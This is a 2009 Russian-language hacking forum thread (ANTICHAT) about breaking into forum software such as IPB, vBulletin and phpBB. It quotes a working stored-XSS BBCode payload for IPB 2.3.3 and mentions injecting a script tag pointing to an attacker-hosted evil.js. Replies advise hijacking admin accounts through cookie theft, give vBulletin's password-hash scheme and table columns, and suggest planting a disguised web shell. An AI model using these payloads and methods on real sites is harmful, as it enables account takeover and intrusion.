HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости CMS / форумов
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.02.2009, 12:56
1ce666
Участник форума
Регистрация: 09.12.2008
Сообщений: 159
С нами: 9168511

Репутация: 214
По умолчанию

Создал файл , закинул туда сплоит и написать в теме пост с <script src=мой домен/evil.js>
А дальше что?
 
Ответить с цитированием

  #2  
Старый 21.02.2009, 00:35
zipa8
Новичок
Регистрация: 07.11.2008
Сообщений: 7
С нами: 9214657

Репутация: 3
По умолчанию

IPB (U) v1.3 Final пропатченный!! Чем можно ломануть????
r57ipb2 - не предлогать)
 
Ответить с цитированием

  #3  
Старый 02.03.2009, 21:53
buyaka
Новичок
Регистрация: 02.03.2009
Сообщений: 5
С нами: 9050016

Репутация: 0
По умолчанию

здравствуйте !
вот этот код
Цитата:
Код: IPB <-2.3.3. [img*]http://qw.ru/qw[url*]http://onerror=alert(/Hack/)//[/url*].jpg[/img*] Found by XenOtai from Veronal H2S Team. Работает в IE и Mozille.
работает на неком форуме IPB 2.3.3, появляется окно предупреждения "hack"
есть ли какое-нибудь практические применение у этого кода, кроме как пугать посетителей ?
еше есть вопрос -
предыстория - на форуме IPB 2.3.3 мне нужно удалить свои темы, у пользователей такой возможности нет (на просьбы администраторы-модераторы не реагируют(правда, один раз ответили, в не очень вежливой форме )
вопрос - какие способы есть, чтобы заполучить права на удаление тем ? (лучше бы попроще ) Я пакостить в форуме совсем не хочу, полезный он, нужно только удалить темы.
 
Ответить с цитированием

  #4  
Старый 02.03.2009, 22:01
[aywo]
Познающий
Регистрация: 01.02.2007
Сообщений: 89
С нами: 10143707

Репутация: 114
По умолчанию

это активная xss, о спосабах применения этой баги читай в разделе статьи!! права на удление проще всего получить поимев акк админа ;-)
 
Ответить с цитированием

  #5  
Старый 02.03.2009, 23:56
buyaka
Новичок
Регистрация: 02.03.2009
Сообщений: 5
С нами: 9050016

Репутация: 0
По умолчанию

читаю, если правильно поняла, то активная xss помогает стащить куки, только не понятно мне, как же куки утащить и где их потом искать
если это поможет завладеть админскими правами
 
Ответить с цитированием

  #6  
Старый 09.03.2009, 09:29
xMSAx
Новичок
Регистрация: 01.03.2009
Сообщений: 19
С нами: 9050968

Репутация: -6
По умолчанию

где хранятся открытые пароли админов в vbulletin
 
Ответить с цитированием

  #7  
Старый 09.03.2009, 13:27
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от xMSAx  
где хранятся открытые пароли админов в vbulletin
В открытом их нету в vBulletin.
Алгоритм шифрования md5(md5($pass).$salt).
Таблица user колонки password,salt.
 
Ответить с цитированием

  #8  
Старый 10.03.2009, 20:24
diznt
Постоянный
Регистрация: 31.01.2008
Сообщений: 643
С нами: 9619229

Репутация: 445


По умолчанию

xMSAx можно слить пароли
как это сделать читай в разделе Vbulletin уязвимости там есть
 
Ответить с цитированием

  #9  
Старый 14.03.2009, 10:13
inc
Новичок
Регистрация: 13.03.2009
Сообщений: 23
С нами: 9033052

Репутация: 5
По умолчанию

какой есть phpbb 3 ненужный php файл который можн заменить на шелл?
 
Ответить с цитированием

  #10  
Старый 14.03.2009, 12:17
Neoveneficus
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
С нами: 9518726

Репутация: 405
По умолчанию

Цитата:
Сообщение от inc  
какой есть phpbb 3 ненужный php файл который можн заменить на шелл?
ненужных файлов в cms не бывает
а что тебе мешает создать свой, замаскировав его под местность?
__________________
II venēficus, ī m.
(с лат.) волшебник, чародей
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.

×

Создать сделку

Продавец: ник или ID

Название сделки:

Сумма USDT:

Срок сделки, дней:

Кто платит комиссию:

Условия сделки:

После создания сделки средства будут зарезервированы в холде до завершения сделки.

×

Мои сделки

Загрузка...
×

Сделка


Загрузка чата...